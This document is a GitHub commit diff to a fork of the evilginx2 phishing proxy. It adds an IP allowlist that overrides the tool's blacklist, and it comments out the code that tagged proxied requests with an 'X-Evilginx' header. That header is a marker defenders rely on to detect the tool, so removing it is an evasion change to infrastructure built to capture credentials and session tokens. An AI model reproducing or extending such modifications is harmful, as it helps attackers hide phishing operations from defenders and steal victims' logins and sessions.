Add allowlisting support and remove X-Evilginx header

felmoltor · Sep 11, 2023 · 769cac9 · 769cac9
1 parent a8d2cd3
commit 769cac9
Show file tree

Hide file tree

Showing 4 changed files with 151 additions and 11 deletions.
diff --git a/core/allowlist.go b/core/allowlist.go
@@ -0,0 +1,126 @@
+package core
+
+import (
+	"bufio"
+	"fmt"
+	"net"
+	"os"
+	"strings"
+
+	"github.com/kgretzky/evilginx2/log"
+)
+
+type AllowIP struct {
+	ipv4 net.IP
+	mask *net.IPNet
+}
+
+type Allowlist struct {
+	ips        map[string]*AllowIP
+	masks      []*AllowIP
+	configPath string
+	verbose    bool
+}
+
+func NewAllowlist(path string) (*Allowlist, error) {
+	f, err := os.OpenFile(path, os.O_CREATE|os.O_RDONLY, 0644)
+	if err != nil {
+		return nil, err
+	}
+	defer f.Close()
+
+	bl := &Allowlist{
+		ips:        make(map[string]*AllowIP),
+		configPath: path,
+		verbose:    true,
+	}
+
+	fs := bufio.NewScanner(f)
+	fs.Split(bufio.ScanLines)
+
+	for fs.Scan() {
+		l := fs.Text()
+		// remove comments
+		if n := strings.Index(l, ";"); n > -1 {
+			l = l[:n]
+		}
+		l = strings.Trim(l, " ")
+
+		if len(l) > 0 {
+			if strings.Contains(l, "/") {
+				ipv4, mask, err := net.ParseCIDR(l)
+				if err == nil {
+					bl.masks = append(bl.masks, &AllowIP{ipv4: ipv4, mask: mask})
+				} else {
+					log.Error("allowlist: invalid ip/mask address: %s", l)
+				}
+			} else {
+				ipv4 := net.ParseIP(l)
+				if ipv4 != nil {
+					bl.ips[ipv4.String()] = &AllowIP{ipv4: ipv4, mask: nil}
+				} else {
+					log.Error("allowlist: invalid ip address: %s", l)
+				}
+			}
+		}
+	}
+
+	log.Info("allowlist: loaded %d ip addresses and %d ip masks", len(bl.ips), len(bl.masks))
+	return bl, nil
+}
+
+func (bl *Allowlist) GetStats() (int, int) {
+	return len(bl.ips), len(bl.masks)
+}
+
+func (bl *Allowlist) AddAllowedIP(ip string) error {
+	if bl.IsAllowed(ip) {
+		return nil
+	}
+
+	ipv4 := net.ParseIP(ip)
+	if ipv4 != nil {
+		bl.ips[ipv4.String()] = &AllowIP{ipv4: ipv4, mask: nil}
+	} else {
+		return fmt.Errorf("allowlist: invalid ip address: %s", ip)
+	}
+
+	// write to file
+	f, err := os.OpenFile(bl.configPath, os.O_APPEND|os.O_WRONLY, 0644)
+	if err != nil {
+		return err
+	}
+	defer f.Close()
+
+	_, err = f.WriteString(ipv4.String() + "\n")
+	if err != nil {
+		return err
+	}
+
+	return nil
+}
+
+func (bl *Allowlist) IsAllowed(ip string) bool {
+	ipv4 := net.ParseIP(ip)
+	if ipv4 == nil {
+		return false
+	}
+
+	if _, ok := bl.ips[ip]; ok {
+		return true
+	}
+	for _, m := range bl.masks {
+		if m.mask != nil && m.mask.Contains(ipv4) {
+			return true
+		}
+	}
+	return false
+}
+
+func (bl *Allowlist) SetVerbose(verbose bool) {
+	bl.verbose = verbose
+}
+
+func (bl *Allowlist) IsVerbose() bool {
+	return bl.verbose
+}
diff --git a/core/config.go b/core/config.go
@@ -92,6 +92,7 @@ const (
 	CFG_PROXY        = "proxy"
 	CFG_PHISHLETS    = "phishlets"
 	CFG_BLACKLIST    = "blacklist"
+	CFG_ALLOWLIST    = "allowlist"
 	CFG_SUBPHISHLETS = "subphishlets"
 )
 

diff --git a/core/http_proxy.go b/core/http_proxy.go
@@ -69,6 +69,7 @@ type HttpProxy struct {
 	cfg               *Config
 	db                *database.Database
 	bl                *Blacklist
+	al                *Allowlist
 	sniListener       net.Listener
 	isRunning         bool
 	sessions          map[string]*Session
@@ -91,14 +92,15 @@ type ProxySession struct {
 	Index        int
 }
 
-func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *database.Database, bl *Blacklist, developer bool) (*HttpProxy, error) {
+func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *database.Database, bl *Blacklist, al *Allowlist, developer bool) (*HttpProxy, error) {
 	p := &HttpProxy{
 		Proxy:             goproxy.NewProxyHttpServer(),
 		Server:            nil,
 		crt_db:            crt_db,
 		cfg:               cfg,
 		db:                db,
 		bl:                bl,
+		al:                al,
 		isRunning:         false,
 		last_sid:          0,
 		developer:         developer,
@@ -157,10 +159,15 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 			}
 			if p.cfg.GetBlacklistMode() != "off" {
 				if p.bl.IsBlacklisted(from_ip) {
-					if p.bl.IsVerbose() {
-						log.Warning("blacklist: request from ip address '%s' was blocked", from_ip)
+					if !p.al.IsAllowed(from_ip) {
+						if p.bl.IsVerbose() {
+							log.Warning("blacklist: request from ip address '%s' was blocked", from_ip)
+						}
+						return p.blockRequest(req)
+					} else {
+						log.Warning("allowlist: request from ip address '%s' was allowlisted", from_ip)
 					}
-					return p.blockRequest(req)
+
 				}
 				if p.cfg.GetBlacklistMode() == "all" {
 					err := p.bl.AddIP(from_ip)
@@ -177,7 +184,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 			}
 
 			req_url := req.URL.Scheme + "://" + req.Host + req.URL.Path
-			o_host := req.Host
+			// o_host := req.Host
 			lure_url := req_url
 			req_path := req.URL.Path
 			if req.URL.RawQuery != "" {
@@ -409,7 +416,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 						return p.blockRequest(req)
 					}
 				}
-				req.Header.Set(p.getHomeDir(), o_host)
+				// req.Header.Set(p.getHomeDir(), o_host)
 
 				if ps.SessionId != "" {
 					if s, ok := p.sessions[ps.SessionId]; ok {
@@ -606,7 +613,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 
 				// check for creds in request body
 				if pl != nil && ps.SessionId != "" {
-					req.Header.Set(p.getHomeDir(), o_host)
+					// req.Header.Set(p.getHomeDir(), o_host)
 					body, err := ioutil.ReadAll(req.Body)
 					if err == nil {
 						req.Body = ioutil.NopCloser(bytes.NewBuffer([]byte(body)))
@@ -1654,9 +1661,9 @@ func (p *HttpProxy) getPhishDomain(hostname string) (string, bool) {
 	return "", false
 }
 
-func (p *HttpProxy) getHomeDir() string {
-	return strings.Replace(HOME_DIR, ".e", "X-E", 1)
-}
+//func (p *HttpProxy) getHomeDir() string {
+//	return strings.Replace(HOME_DIR, ".e", "X-E", 1)
+//}
 
 func (p *HttpProxy) getPhishSub(hostname string) (string, bool) {
 	for site, pl := range p.cfg.phishlets {

diff --git a/main.go b/main.go
@@ -134,6 +134,12 @@ func main() {
 		return
 	}
 
+	al, err := core.NewAllowlist(filepath.Join(*cfg_dir, "allowlist.txt"))
+	if err != nil {
+		log.Error("allowlist: %s", err)
+		return
+	}
+
 	files, err := ioutil.ReadDir(phishlets_path)
 	if err != nil {
 		log.Fatal("failed to list phishlets directory '%s': %v", phishlets_path, err)
@@ -169,7 +175,7 @@ func main() {
 		return
 	}
 
-	hp, _ := core.NewHttpProxy(cfg.GetServerBindIP(), cfg.GetHttpsPort(), cfg, crt_db, db, bl, *developer_mode)
+	hp, _ := core.NewHttpProxy(cfg.GetServerBindIP(), cfg.GetHttpsPort(), cfg, crt_db, db, bl, al, *developer_mode)
 	hp.Start()
 
 	t, err := core.NewTerminal(hp, cfg, crt_db, db, *developer_mode)